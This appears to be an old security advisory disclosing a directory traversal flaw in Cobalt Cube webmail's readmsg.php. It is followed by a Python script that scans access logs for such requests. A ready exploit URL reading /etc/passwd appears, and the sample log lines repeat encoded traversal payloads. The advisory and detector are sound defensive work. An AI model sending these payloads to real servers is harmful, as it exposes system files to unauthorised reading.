Webmail on the Cobalt Cube contains a directory traversal vulnerability which allows users with mailboxes to read any file on the system. Exploit URLs included. Verified to work against the Sun Cube III as well.
1affd95a288c842d09addf3da78a30cb53346dabcd3917f23ac63d00b2e272cf
I just got a new Cobalt Cube today and I have been poking around at it
for security issues... I noticed this minor issue in the webmail system.
Your users are not allowed to have shell access by default; however, if
they malform their mailbox requests they can read local files with the
perms of the webserver. If your users have shell access they will not
really be gaining anything; however, this could be used to remotely
gather information for a future attack.
[admin admin]$ uname -a
Linux cube.ckfr.com 2.2.16C7 #1 Fri Sep 8 15:58:03 PDT 2000 i586 unknown
[admin admin]$ cat /etc/issue
Cobalt Linux release 6.0 (Carmel)
Kernel 2.2.16C7 on an i586
http://YOURCOBALTBOX:444/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1
-KF
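
A log check for the request pattern reported above, as an added example that is not part of the original advisory: it scans web server access logs for `readmsg.php` requests whose `mailbox` parameter contains a `..` path segment or an absolute path, including percent-encoded and double-encoded forms. The Common Log Format layout, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Common Log Format (not taken from a real server).
SAMPLE_LOG = """\
192.0.2.10 - alice [08/Sep/2000:16:01:12 -0700] "GET /base/webmail/readmsg.php?mailbox=INBOX&id=4 HTTP/1.0" 200 2310
192.0.2.44 - bob [08/Sep/2000:16:03:40 -0700] "GET /base/webmail/readmsg.php?mailbox=../../../../etc/passwd&id=1 HTTP/1.0" 200 911
192.0.2.44 - bob [08/Sep/2000:16:04:02 -0700] "GET /base/webmail/readmsg.php?mailbox=%2e%2e%2f%2e%2e%2fetc%2fissue&id=1 HTTP/1.0" 200 64
192.0.2.44 - bob [08/Sep/2000:16:04:30 -0700] "GET /base/webmail/readmsg.php?mailbox=%252e%252e%252fetc%252fpasswd&id=1 HTTP/1.0" 404 0
192.0.2.10 - alice [08/Sep/2000:16:05:00 -0700] "GET /base/webmail/readmsg.php?mailbox=Sent..Items&id=2 HTTP/1.0" 200 1200
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ (\S+) \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(mailbox):
    """True if the mailbox value has a '..' path segment, is absolute, or holds a NUL."""
    name = fully_decode(mailbox).replace("\\", "/")
    return name.startswith("/") or ".." in name.split("/") or "\x00" in name

def find_traversal_requests(log_text, script="/base/webmail/readmsg.php"):
    """Return (client, user, status, decoded mailbox) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, user, target, status = m.groups()
        url = urlsplit(target)
        if url.path != script:
            continue
        # parse_qs decodes once; fully_decode handles any further encoding layers.
        for mailbox in parse_qs(url.query, keep_blank_values=True).get("mailbox", []):
            if is_traversal(mailbox):
                hits.append((client, user, int(status), fully_decode(mailbox)))
    return hits

if __name__ == "__main__":
    for hit in find_traversal_requests(SAMPLE_LOG):
        print(hit)
```

A 200 status on a flagged line is the case to review first, since it suggests the server returned content for the traversed path. A mailbox name such as `Sent..Items` is not flagged because `..` only counts as a whole path segment.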